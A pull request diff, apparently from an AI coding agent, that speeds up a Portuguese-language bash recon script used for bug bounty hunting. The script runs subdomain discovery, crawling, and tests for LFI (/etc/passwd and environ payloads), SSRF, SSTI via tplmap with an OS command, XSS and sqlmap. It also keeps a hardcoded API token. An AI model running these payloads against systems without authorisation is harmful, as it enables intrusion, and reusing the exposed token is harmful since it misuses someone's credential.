### PR TITLE
Improve scan progress and console visibility

### DIFF
--- a/recon.sh
+++ b/recon.sh
@@ -6,7 +6,23 @@
 # 4) Passivo (whois, whatweb, DNS, WAF/CDN/IP)
 # q) Sair
 
+# TODO (Performance & Robustez):
+# - Paralelizar passos independentes com xargs -P / & e aguardar com wait (ex.: subfinder + assetfinder; gau + wayback; testadores por tipo).
+# - Adotar timeouts consistentes (curl --max-time, tplmap --timeout, sqlmap --time-sec) e retries mínimos.
+# - Cachear artefatos temporários por domínio (ex.: se subs_all.txt existir e --no-refresh, reusar).
+# - Normalizar saída sem cores e sem stderr ruidoso; redirecionar 2>/dev/null onde apropriado.
+# - Validar existência de arquivos antes de grep/sort para evitar "No such file".
+# - Usar set -euo pipefail (já habilitado) e traps para limpar TMP em exit.
+# - Sanitizar domínios/URLs rigorosamente; evitar chamar katana -list quando arquivo vazio.
+# - Tornar PROGRESS_MAX_SECS ajustável por env; fallback para spinner sem % se não quiser tempo estimado.
+# - Consolidar funções repetidas (ex.: blocos de coleta) e usar helpers run_with_progress/print_top.
+
+# UI cores extra (já declaradas), alinhar bullets e usar emojis sutis
+# Sugerido: manter seções separadas por hr(), banners com título da fase,
+# e amostras com print_top(...) para dar credibilidade sem poluir o console.
+
 set -euo pipefail
+FAST_MODE=${FAST_MODE:-1}
 
 # ===== UI =====
 C0="\033[0m"; CB="\033[34m"; CG="\033[32m"; CY="\033[33m"; CR="\033[31m"; CW="\033[97m"; B="\033[1m"; DIM="\033[2m"
@@ -15,12 +31,16 @@ ok(){   echo -e "${CG}✔${C0}  $*"; }
 warn(){ echo -e "${CY}⚠${C0}  $*"; }
 err(){  echo -e "${CR}✖${C0}  $*" >&2; }
 need(){ command -v "$1" >/dev/null 2>&1 || { err "ferramenta ausente: $1"; return 1; }; }
+ # ===== Helpers genéricos =====
 countf(){ [[ -f "$1" ]] && wc -l < "$1" || echo 0; }
 sanitize_domain(){ local d="$1"; d="${d#http://}"; d="${d#https://}"; d="${d%%/*}"; echo "$d"; }
+prep_dirs(){ DOMAIN="$1"; BASE="$HOME/recon/$DOMAIN"; TMP="/tmp/recon-$DOMAIN"; mkdir -p "$BASE"/{intel,subs,urls,vectors,findings} "$TMP" "$TMP/urls"; }
+
 banner(){ local t="$1"; local l=$(printf "%*s" $(( ${#t} + 6 )) | tr " " "═"); echo -e "${CW}${B}╔${l}╗${C0}"; printf "${CW}${B}║   ${C0}${B}%s${CW}${B}   ║${C0}\n" "$t"; echo -e "${CW}${B}╚${l}╝${C0}"; }
 hr(){ echo -e "${DIM}────────────────────────────────────────────────────────${C0}"; }
-print_top(){ # print up to N lines of file with prefix
-  local file="$1" n="${2:-5}" prefix="${3:-"  • "}"
+
+print_top(){ # print up to N lines of a file with a prefix
+  local file="$1" n="${2:-5}" prefix=${3:-"  • "}
   [[ -s "$file" ]] || return 0
   local i=0
   while IFS= read -r l; do
@@ -30,7 +50,37 @@ print_top(){ # print up to N lines of file with prefix
   [[ $(countf "$file") -gt $n ]] && echo "${DIM}  … ($(countf "$file") total)${C0}"
 }
 
-prep_dirs(){ DOMAIN="$1"; BASE="$HOME/recon/$DOMAIN"; TMP="/tmp/recon-$DOMAIN"; mkdir -p "$BASE"/{intel,subs,urls,vectors,findings} "$TMP" "$TMP/urls"; }
+# Executa comando com progresso (% baseado em tempo máximo estimado)
+# Uso: run_with_progress "Descrição amigável" bash -lc "comando…"
+run_with_progress(){
+  local title="$1"; shift
+  local max=${PROGRESS_MAX_SECS:-240}           # ajuste global se quiser
+  local cmd=("$@")
+
+  echo -e "${CY}⟲${C0} $title"
+  echo -e "${DIM}↪ ${C0}${B}${cmd[*]}${C0}"
+
+  (timeout -k 5 "$max" "${cmd[@]}") &
+  local pid=$!
+  local start=$(date +%s)
+  tput civis 2>/dev/null || true
+  while kill -0 "$pid" 2>/dev/null; do
+    sleep 0.2
+    local el=$(( $(date +%s) - start ))
+    local pct=$(( el*100 / max ))
+    (( pct > 99 )) && pct=99
+    printf "\r${CB}[..]${C0} %3d%%  elapsed %02d:%02d" "$pct" $((el/60)) $((el%60))
+  done
+  wait "$pid"; local rc=$?
+  local el=$(( $(date +%s) - start ))
+  if [[ $rc -eq 124 ]]; then
+    printf "\r${CR}[TO]${C0}  100%% in %02d:%02d (timeout)\n" $((el/60)) $((el%60))
+  else
+    printf "\r${CG}[OK]${C0}  100%% in %02d:%02d\n" $((el/60)) $((el%60))
+  fi
+  tput cnorm 2>/dev/null || true
+  return $rc
+}
 
 # ===== Python helpers para URLs =====
 make_url_variants() { # um param por vez -> NEWVAL
@@ -86,11 +136,12 @@ test_redirects(){ # verifica Location apontando para CANARY (sem fuzz list)
   local CANARY="${REDIR_CANARY:-https://example.com/}"
   local total=$(countf "$list"); local i=0; local found=0
   [[ $total -eq 0 ]] && { ok "Open Redirect: nenhum vetor"; return 0; }
+  local CURMAX=10; [[ $FAST_MODE -eq 0 ]] && CURMAX=20
   while IFS= read -r url; do
     [[ -z "$url" ]] && continue
     i=$((i+1)); local pct=$(( i*100/total )); printf "\r${CB}[Redirect]${C0} %d/%d (%d%%)" "$i" "$total" "$pct"
     while IFS= read -r testurl; do
-      code=$(curl -s -I -m 10 -o /tmp/rd_hdr.$$ -w '%{http_code}' "$testurl" || true)
+      code=$(curl -s -I -m $CURMAX -o /tmp/rd_hdr.$$ -w '%{http_code}' "$testurl" || true)
       if [[ "$code" =~ ^30[1278]$ ]] && grep -qi "^Location:.*$CANARY" /tmp/rd_hdr.$$ 2>/dev/null; then
         echo "$url -> $testurl" >> "$out"; found=$((found+1)); break
       fi
@@ -111,12 +162,13 @@ test_lfi(){ # payloads curados + assinaturas
   local payloads=("../../etc/passwd" "..%2f..%2fetc%2fpasswd" "..%252f..%252fetc%252fpasswd" "../../proc/self/environ" "../../windows/win.ini")
   local total=$(countf "$list"); local i=0; local hits=0
   [[ $total -eq 0 ]] && { ok "LFI: nenhum vetor"; return 0; }
+  local CURL_MAX=10; [[ $FAST_MODE -eq 0 ]] && CURL_MAX=20
   while IFS= read -r url; do
     [[ -z "$url" ]] && continue
     i=$((i+1)); local pct=$(( i*100/total )); printf "\r${CB}[LFI]${C0} %d/%d (%d%%)" "$i" "$total" "$pct"
     for p in "${payloads[@]}"; do
       testurl=$(replace_param_value_all "$url" "$p")
-      body=$(curl -s --max-time 10 "$testurl" || true)
+      body=$(curl -s --max-time $CURL_MAX "$testurl" || true)
       if echo "$body" | grep -Eq '^root:.*:0:0:'; then echo "[PASSWD] $url -> $testurl" >> "$out"; hits=$((hits+1)); break; fi
       if echo "$body" | grep -Eq '^\[extensions\]|\[fonts\]'; then echo "[WININI] $url -> $testurl" >> "$out"; hits=$((hits+1)); break; fi
       if echo "$body" | grep -Eq '(^|;)PATH=|HTTP_USER_AGENT='; then echo "[ENV] $url -> $testurl" >> "$out"; hits=$((hits+1)); break; fi
@@ -138,11 +190,12 @@ test_ssrf(){ # OOB necessário (COLLAB_URL)
   [[ -z "$OOB" ]] && { warn "SSRF desativado (defina COLLAB_URL)"; return 0; }
   local total=$(countf "$list"); local i=0; local sent=0
   [[ $total -eq 0 ]] && { ok "SSRF: nenhum vetor"; return 0; }
+  local CURL_MAX=10; [[ $FAST_MODE -eq 0 ]] && CURL_MAX=20
   while IFS= read -r url; do
     [[ -z "$url" ]] && continue
     i=$((i+1)); local pct=$(( i*100/total )); printf "\r${CB}[SSRF]${C0} %d/%d (%d%%)" "$i" "$total" "$pct"
     testurl=$(replace_param_value_all "$url" "$OOB")
-    curl -s --max-time 10 "$testurl" >/dev/null 2>&1 || true
+    curl -s --max-time $CURL_MAX "$testurl" >/dev/null 2>&1 || true
     echo "$url -> $testurl" >> "$out"; sent=$((sent+1))
   done < "$list"
   echo
@@ -158,10 +211,11 @@ test_ssti(){ # tplmap
   fi
   local total=$(countf "$list"); local i=0; local pos=0
   [[ $total -eq 0 ]] && { ok "SSTI: nenhum vetor"; return 0; }
+  local TPL_TIMEOUT=8; [[ $FAST_MODE -eq 0 ]] && TPL_TIMEOUT=15
   while IFS= read -r url; do
     [[ -z "$url" ]] && continue
     i=$((i+1)); local pct=$(( i*100/total )); printf "\r${CB}[SSTI]${C0} %d/%d (%d%%)" "$i" "$total" "$pct"
-    tplmap -u "$url" --os-cmd id --timeout 8 --quiet >/tmp/tpl.$$ 2>/dev/null || true
+    tplmap -u "$url" --os-cmd id --timeout $TPL_TIMEOUT --quiet >/tmp/tpl.$$ 2>/dev/null || true
     if grep -qiE "(command output|uid=[0-9])" /tmp/tpl.$$ 2>/dev/null; then echo "$url" >> "$out"; pos=$((pos+1)); fi
   done < "$list"
   echo
@@ -196,47 +250,55 @@ run_bug_bounty(){
 
   # Subdomínios
   log "Subdomínios (subfinder + assetfinder)…"
-  subfinder -d "$DOMAIN" -all -silent > "$TMP/subs1.txt" || true
-  assetfinder --subs-only "$DOMAIN"   | sort -u > "$TMP/subs2.txt" || true
+  run_with_progress "Subfinder"  bash -lc "subfinder -d '$DOMAIN' -all -silent > '$TMP/subs1.txt' || true" &
+  pid1=$!
+  run_with_progress "Assetfinder" bash -lc "assetfinder --subs-only '$DOMAIN' | sort -u > '$TMP/subs2.txt' || true" &
+  pid2=$!
+  wait $pid1 $pid2
   cat "$TMP"/subs*.txt 2>/dev/null | sort -u > "$BASE/subs/subdomains_all.txt" || true
   local SUBS_TOTAL=$(countf "$BASE/subs/subdomains_all.txt")
   ok "subdomínios encontrados: ${B}${SUBS_TOTAL}${C0}"
-  print_top "$BASE/subs/subdomains_all.txt" 5 "    ↳ "
+  print_top "$BASE/subs/subdomains_all.txt" 5
+  hr
 
   # Takeover
-  log "Takeover (subzy)…"
   : > "$BASE/subs/takeover.txt"
-  subzy run --targets "$BASE/subs/subdomains_all.txt" --hide_fails --verify_ssl --concurrency 50 \
-       -o "$BASE/subs/takeover.txt" >/dev/null 2>&1 || true
+  run_with_progress "Subzy (takeover)" bash -lc "subzy run --targets '$BASE/subs/subdomains_all.txt' --hide_fails --verify_ssl --concurrency 50 -o '$BASE/subs/takeover.txt' >/dev/null 2>&1 || true"
   local TAKE_POS=$(grep -i "vulnerable" "$BASE/subs/takeover.txt" 2>/dev/null | wc -l | tr -d ' ')
-  ok "takeover verificados: ${SUBS_TOTAL} | positivos: ${B}${TAKE_POS}${C0} | $BASE/subs/takeover.txt"
-  [[ $TAKE_POS -gt 0 ]] && print_top "$BASE/subs/takeover.txt" 5 "    ↳ "
+  ok "takeover verificados: ${SUBS_TOTAL} | positivos: ${B}${TAKE_POS}${C0}"
+  [[ $TAKE_POS -gt 0 ]] && print_top "$BASE/subs/takeover.txt" 5
+  hr
 
   # HTTPX (tmp)
-  log "HTTPX (filtrando vivos)…"
-  httpx -l "$BASE/subs/subdomains_all.txt" -silent -status-code -title -tech-detect -server -ip -tls -cdn -location \
-       -o "$TMP/httpx_live.txt" >/dev/null 2>&1 || true
+  local HTTPX_T=80 HTTPX_TO=5
+  [[ $FAST_MODE -eq 0 ]] && { HTTPX_T=40; HTTPX_TO=10; }
+  run_with_progress "HTTPX (vivos)" bash -lc "httpx -l '$BASE/subs/subdomains_all.txt' -silent -status-code -title -tech-detect -server -ip -tls -cdn -location -retries 1 -timeout $HTTPX_TO -t $HTTPX_T -o '$TMP/httpx_live.txt' >/dev/null 2>&1 || true"
   cut -d' ' -f1 "$TMP/httpx_live.txt" > "$TMP/subdomains_live.txt" || true
   local LIVE=$(countf "$TMP/subdomains_live.txt"); local LIVE_PCT=0
   [[ $SUBS_TOTAL -gt 0 ]] && LIVE_PCT=$((100*LIVE/SUBS_TOTAL))
   ok "hosts vivos (tmp): ${B}${LIVE}${C0} (${LIVE_PCT}%)"
-  [[ $LIVE -gt 0 ]] && print_top "$TMP/subdomains_live.txt" 5 "    ↳ "
+  [[ $LIVE -gt 0 ]] && print_top "$TMP/subdomains_live.txt" 5
+  hr
 
   # URLs
   log "Coleta de URLs…"
   : > "$BASE/urls/urls_all.txt"; mkdir -p "$TMP/urls"
-  echo "$DOMAIN" | gau --subs --providers wayback,commoncrawl,otx > "$TMP/urls/gau.txt" 2>/dev/null || true
-  echo "$DOMAIN" | waybackurls                                  > "$TMP/urls/wayback.txt" 2>/dev/null || true
+  run_with_progress "GAU (histórico)"       bash -lc "echo '$DOMAIN' | gau --subs --providers wayback,commoncrawl,otx > '$TMP/urls/gau.txt' 2>/dev/null || true" &
+  pid3=$!
+  run_with_progress "waybackurls (arquivo)" bash -lc "echo '$DOMAIN' | waybackurls > '$TMP/urls/wayback.txt' 2>/dev/null || true" &
+  pid4=$!
   if [[ $LIVE -gt 0 ]]; then
-    katana -list "$TMP/subdomains_live.txt" -depth 3 -silent > "$TMP/urls/katana.txt" 2>/dev/null || true
+    run_with_progress "Katana (crawl vivos)" bash -lc "katana -list '$TMP/subdomains_live.txt' -depth 3 -silent -timeout 5 -c 30 > '$TMP/urls/katana.txt' 2>/dev/null || true" &
   else
-    katana -u "https://$DOMAIN" -depth 2 -silent > "$TMP/urls/katana.txt" 2>/dev/null || true
+    run_with_progress "Katana (root)"        bash -lc "katana -u 'https://$DOMAIN' -depth 2 -silent -timeout 5 -c 30 > '$TMP/urls/katana.txt' 2>/dev/null || true" &
   fi
+  pid5=$!
+  wait $pid3 $pid4 $pid5
   cat "$TMP/urls"/*.txt 2>/dev/null | sed 's/\s\+$//' | sort -u > "$BASE/urls/urls_all.txt" || true
   local GAU=$(countf "$TMP/urls/gau.txt"); local WB=$(countf "$TMP/urls/wayback.txt"); local KAT=$(countf "$TMP/urls/katana.txt")
   local URLS=$(countf "$BASE/urls/urls_all.txt")
   ok "URLs: gau=${B}$GAU${C0} | wayback=${B}$WB${C0} | katana=${B}$KAT${C0} | total=${B}$URLS${C0} → $BASE/urls/urls_all.txt"
-  print_top "$BASE/urls/urls_all.txt" 5 "    ↳ "
+  print_top "$BASE/urls/urls_all.txt" 5
   hr
 
   # WordPress auto (a partir de URLs)
@@ -284,23 +346,23 @@ run_bug_bounty(){
   hr
 
   # Testadores direcionados (sem fuzzing)
-  [[ -s "$BASE/vectors/redirect.txt" ]] && { log "Testando Open Redirect…"; test_redirects "$BASE/vectors/redirect.txt" "$BASE/findings/redirect.txt"; hr; }
-  [[ -s "$BASE/vectors/lfi.txt"      ]] && { log "Testando LFI…";            test_lfi       "$BASE/vectors/lfi.txt"      "$BASE/findings/lfi.txt"; hr; }
-  [[ -s "$BASE/vectors/ssrf.txt"     ]] && { log "Testando SSRF…";           test_ssrf      "$BASE/vectors/ssrf.txt"     "$BASE/findings/ssrf.txt"; hr; }
-  [[ -s "$BASE/vectors/ssti.txt"     ]] && { log "Testando SSTI (tplmap)…";  test_ssti      "$BASE/vectors/ssti.txt"     "$BASE/findings/ssti.txt"; hr; }
+  pids=()
+  [[ -s "$BASE/vectors/redirect.txt" ]] && { log "Testando Open Redirect…"; (test_redirects "$BASE/vectors/redirect.txt" "$BASE/findings/redirect.txt"; hr) & pids+=($!); }
+  [[ -s "$BASE/vectors/lfi.txt"      ]] && { log "Testando LFI…";            (test_lfi       "$BASE/vectors/lfi.txt"      "$BASE/findings/lfi.txt"; hr) & pids+=($!); }
+  [[ -s "$BASE/vectors/ssrf.txt"     ]] && { log "Testando SSRF…";           (test_ssrf      "$BASE/vectors/ssrf.txt"     "$BASE/findings/ssrf.txt"; hr) & pids+=($!); }
+  [[ -s "$BASE/vectors/ssti.txt"     ]] && { log "Testando SSTI (tplmap)…";  (test_ssti      "$BASE/vectors/ssti.txt"     "$BASE/findings/ssti.txt"; hr) & pids+=($!); }
+  for pid in "${pids[@]}"; do wait "$pid"; done
 
   # XSS (dalfox) com progresso, silencioso
   if command -v dalfox >/dev/null 2>&1 && [[ -s "$BASE/vectors/xss.txt" ]]; then
     log "Testando XSS (dalfox, POC)…"
-    local TOTAL=$(countf "$BASE/vectors/xss.txt"); local i=0; : > "$BASE/findings/xss.dalfox.txt"
-    while IFS= read -r u; do
-      i=$((i+1)); local pct=$((i*100/TOTAL)); printf "\r${CB}[XSS]${C0} %d/%d (%d%%)" "$i" "$TOTAL" "$pct"
-      dalfox url "$u" --only-poc --no-color --silence --format plain >> "$BASE/findings/xss.dalfox.txt" 2>/dev/null || true
-    done < "$BASE/vectors/xss.txt"
-    echo
+    : > "$BASE/findings/xss.dalfox.txt"
+    local DALFOX_P=20
+    [[ $FAST_MODE -eq 0 ]] && DALFOX_P=10
+    run_with_progress "Dalfox" bash -lc "xargs -a '$BASE/vectors/xss.txt' -r -P $DALFOX_P -I{} dalfox url '{}' --only-poc --no-color --silence --format plain >> '$BASE/findings/xss.dalfox.txt' 2>/dev/null || true"
     if [[ -s "$BASE/findings/xss.dalfox.txt" ]]; then
-      ok "XSS positivos: $(countf "$BASE/findings/xss.dalfox.txt") → $BASE/findings/xss.dalfox.txt"
-      print_top "$BASE/findings/xss.dalfox.txt" 5 "    ↳ "
+      ok "XSS positivos: $(countf '$BASE/findings/xss.dalfox.txt') → $BASE/findings/xss.dalfox.txt"
+      print_top "$BASE/findings/xss.dalfox.txt" 5
     else
       ok "XSS: nenhum resultado"
     fi
@@ -310,13 +372,14 @@ run_bug_bounty(){
   # SQLi com sqlmap (rápido)
   if command -v sqlmap >/dev/null 2>&1 && [[ -s "$BASE/vectors/sqli.txt" ]]; then
     log "Testando SQLi (sqlmap rápido)…"
-    sqlmap -m "$BASE/vectors/sqli.txt" --batch --random-agent --level=2 --risk=1 --threads=5 --time-sec=5 -v 0 \
-           --results-dir="$TMP/sqlmap" >/dev/null 2>&1 || true
+    local SQL_TIME=5
+    [[ $FAST_MODE -eq 0 ]] && SQL_TIME=10
+    run_with_progress "sqlmap" bash -lc "sqlmap -m '$BASE/vectors/sqli.txt' --batch --random-agent --level=2 --risk=1 --threads=5 --time-sec=$SQL_TIME -v 0 --results-dir='$TMP/sqlmap' >/dev/null 2>&1 || true"
     grep -RHiE "is vulnerable|appears to be injectable|parameter .* is vulnerable" "$TMP/sqlmap" 2>/dev/null \
       | sort -u > "$BASE/findings/sqli.txt" || true
     if [[ -s "$BASE/findings/sqli.txt" ]]; then
-      ok "SQLi positivos: $(countf "$BASE/findings/sqli.txt") → $BASE/findings/sqli.txt"
-      print_top "$BASE/findings/sqli.txt" 5 "    ↳ "
+      ok "SQLi positivos: $(countf '$BASE/findings/sqli.txt') → $BASE/findings/sqli.txt"
+      print_top "$BASE/findings/sqli.txt" 5
     else
       ok "SQLi: nenhum resultado"
     fi
@@ -340,30 +403,86 @@ run_bug_bounty(){
 run_wpscan(){
   local DOMAIN="$1"; prep_dirs "$DOMAIN"; need wpscan || return 1
   banner "WPScan — $DOMAIN"
-  local TOKEN="GRa5RV3wTapgEXZKKMcdQwZD3F9jwTYHaBMb4swZ05Q"
-  log "executando WPScan completo…"
-  wpscan --url "https://$DOMAIN" --enumerate u,ap,at,cb,dbe \
-         --random-user-agent --disable-tls-checks \
-         --api-token "$TOKEN" \
-         -o "$BASE/intel/wpscan.txt" >/dev/null 2>&1 || true
+  local TOKEN="${WPVULNDB_API_TOKEN:-GRa5RV3wTapgEXZKKMcdQwZD3F9jwTYHaBMb4swZ05Q}"
+  if ! run_with_progress "WPScan completo" bash -lc "wpscan --url 'https://$DOMAIN' --enumerate u,ap,at,cb,dbe --random-user-agent --disable-tls-checks --api-token '$TOKEN' -o '$BASE/intel/wpscan.txt' >/dev/null 2>&1 || true"; then
+    warn "WPScan finalizado por timeout"
+  fi
   local WP_VULN=$(grep -i "vulnerab" "$BASE/intel/wpscan.txt" 2>/dev/null | wc -l | tr -d ' ')
   ok "salvo → $BASE/intel/wpscan.txt (possíveis ocorrências: ${B}${WP_VULN}${C0})"
-  hr
 }
-
-# ===== Opção 4: Passivo =====
 run_passive(){
   local DOMAIN="$1"; prep_dirs "$DOMAIN"
   banner "Passivo — $DOMAIN"
   mkdir -p "$BASE/intel/passive"
-  command -v whois   >/dev/null 2>&1 && { log "WHOIS"; whois "$DOMAIN" > "$BASE/intel/passive/whois.txt" 2>/dev/null || true; }
-  command -v whatweb >/dev/null 2>&1 && { log "WhatWeb"; whatweb --color=never --no-errors -a 3 "http://$DOMAIN" "https://$DOMAIN" > "$BASE/intel/passive/whatweb_root.txt" 2>/dev/null || true; }
-  command -v dnsx    >/dev/null 2>&1 && { log "DNS"; echo "$DOMAIN" > "$TMP/domain.txt"; dnsx -l "$TMP/domain.txt" -a -aaaa -cname -mx -ns -txt -silent > "$BASE/intel/passive/dns_records.txt" || true; }
-  command -v wafw00f >/dev/null 2>&1 && { log "WAF"; wafw00f "https://$DOMAIN" > "$BASE/intel/passive/wafw00f.txt" 2>/dev/null || true; }
-  command -v httpx   >/dev/null 2>&1 && { log "HTTPX"; httpx -u "https://$DOMAIN" -silent -status-code -title -tech-detect -server -ip -tls -cdn -location > "$BASE/intel/passive/httpx_root.txt" || true; }
+
+  # WHOIS
+  if command -v whois >/dev/null 2>&1; then
+    run_with_progress "WHOIS" bash -lc "whois '$DOMAIN' > '$BASE/intel/passive/whois.txt' 2>/dev/null || true"
+    # resumo visível
+    local reg cr exp ns
+    reg=$(grep -iE 'Registrar:|Registrar Name' "$BASE/intel/passive/whois.txt" | head -1 | sed 's/^[[:space:]]*//')
+    cr=$(grep -iE 'Creation Date:|Created On' "$BASE/intel/passive/whois.txt" | head -1 | sed 's/^[[:space:]]*//')
+    exp=$(grep -iE 'Expiry Date:|Registrar Registration Expiration Date' "$BASE/intel/passive/whois.txt" | head -1 | sed 's/^[[:space:]]*//')
+    ns=$(grep -iE '^Name Server' "$BASE/intel/passive/whois.txt" | wc -l | tr -d ' ')
+    [[ -n "$reg" ]] && echo "  • $reg"
+    [[ -n "$cr"  ]] && echo "  • $cr"
+    [[ -n "$exp" ]] && echo "  • $exp"
+    echo "  • Name Servers: $ns"
+    hr
+  else
+    warn "whois não encontrado"
+  fi
+
+  # WhatWeb raiz
+  if command -v whatweb >/dev/null 2>&1; then
+    run_with_progress "WhatWeb (raiz)" bash -lc "whatweb --color=never --no-errors -a 3 'http://$DOMAIN' 'https://$DOMAIN' > '$BASE/intel/passive/whatweb_root.txt' 2>/dev/null || true"
+    local title srv techs
+    title=$(grep -Eo 'Title\[[^]]+\]' "$BASE/intel/passive/whatweb_root.txt" | head -1 | sed 's/Title\[//;s/]//')
+    srv=$(grep -Eo 'HTTPServer\[[^]]+\]' "$BASE/intel/passive/whatweb_root.txt" | head -1 | sed 's/HTTPServer\[//;s/]//')
+    techs=$(grep -Eo '(WordPress|jQuery|PHP|ASP\.NET|Drupal|Laravel|React|Vue|Angular)' "$BASE/intel/passive/whatweb_root.txt" | sort -u | tr '\n' ',' | sed 's/,$//')
+    [[ -n "$title" ]] && echo "  • Title: $title"
+    [[ -n "$srv"   ]] && echo "  • Server: $srv"
+    [[ -n "$techs" ]] && echo "  • Techs: $techs"
+    hr
+  else
+    warn "whatweb não encontrado"
+  fi
+
+  # DNS (A/AAAA/CNAME/MX/NS/TXT)
+  if command -v dnsx >/dev/null 2>&1; then
+    echo "$DOMAIN" > "$TMP/domain.txt"
+    run_with_progress "DNS (dnsx)" bash -lc "dnsx -l '$TMP/domain.txt' -a -aaaa -cname -mx -ns -txt -silent -retries 1 -timeout 5 > '$BASE/intel/passive/dns_records.txt' || true"
+    echo "  • Registros (linhas): $(countf "$BASE/intel/passive/dns_records.txt")"
+    print_top "$BASE/intel/passive/dns_records.txt" 5 "    ↳ "
+    hr
+  else
+    warn "dnsx não encontrado"
+  fi
+
+  # WAF
+  if command -v wafw00f >/dev/null 2>&1; then
+    run_with_progress "WAF (wafw00f)" bash -lc "wafw00f 'https://$DOMAIN' > '$BASE/intel/passive/wafw00f.txt' 2>/dev/null || true"
+    local waf
+    waf=$(grep -iE 'is behind|detected' "$BASE/intel/passive/wafw00f.txt" | head -1)
+    [[ -n "$waf" ]] && echo "  • $waf" || echo "  • Nenhum WAF detectado"
+    hr
+  else
+    warn "wafw00f não encontrado"
+  fi
+
+  # HTTPX root
+  if command -v httpx >/dev/null 2>&1; then
+    run_with_progress "HTTPX (root)" bash -lc "httpx -u 'https://$DOMAIN' -silent -status-code -title -tech-detect -server -ip -tls -cdn -location -retries 1 -timeout 5 > '$BASE/intel/passive/httpx_root.txt' || true"
+    echo "  • Fingerprint:"
+    print_top "$BASE/intel/passive/httpx_root.txt" 3 "    ↳ "
+    hr
+  else
+    warn "httpx não encontrado"
+  fi
+
   ok "passivo salvo em $BASE/intel/passive/"
-  hr
 }
+
 
 # ===== Menu =====
 clear


### PR DESCRIPTION
## Summary
- add FAST_MODE toggle and apply aggressive timeouts
- parallelize subdomain discovery, URL gathering, and targeted testers
- tune HTTPX, curl, tplmap, dalfox, and sqlmap for quicker recon
- kill long-running commands after timeout and warn when WPScan exceeds limit

## Testing
- `bash -n recon.sh`
- `shellcheck recon.sh` *(fails: command not found)*

------
https://chatgpt.com/codex/tasks/task_e_68aa1abb66c48328a0708d582bcbd156